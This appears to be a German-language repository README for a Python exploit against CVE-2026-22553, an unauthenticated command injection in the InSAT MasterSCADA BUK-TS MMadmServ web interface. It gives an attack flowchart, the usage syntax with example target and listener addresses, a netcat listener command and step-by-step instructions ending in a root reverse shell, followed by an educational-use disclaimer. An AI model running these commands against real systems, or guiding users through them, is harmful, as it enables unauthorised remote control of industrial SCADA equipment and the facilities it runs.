
Nicht authentifizierter OS-Befehlseinschleusungs-Exploit für die InSAT MasterSCADA BUK-TS MMadmServ Web-Oberfläche. Liefert eine Reverse-Shell mit Root-Berechtigungen über eine HTTP-POST-Anfrage. CVSS 9.8 kritisch.
CVE-2026-22553 | CVSS 9.8 Kritisch | Exploit-Autor Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS weist eine Nicht authentifizierte OS-Befehlseinschleusung im MMadmServ-Webinterface auf. Diese Sicherheitslücke ermöglicht es entfernten Angreifern, ohne Authentifizierung eine vollständige Remote-Codeausführung (RCE) zu erreichen.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fff
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| Option | Beschreibung |
|---|---|
target | Ziel-URL (z.B. http://ip:port) |
--lhost | Ihre IP-Adresse (Reverse Shell) |
--lport | Ihr Listening-Port |
Starten Sie einen Listener auf Ihrem Rechner:
nc -lvnp 4444
Führen Sie den Exploit aus:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
Erhalten Sie eine Reverse-Shell mit root/system-Rechten.
Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Penetrationstest-Zwecken bereitgestellt.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal und kann gegen internationale Gesetze verstoßen.
Der Autor übernimmt keine Verantwortung für Missbrauch.
Mohammed Idrees Banyamer
Star ⭐ dieses Repository, wenn Sie es nützlich fanden!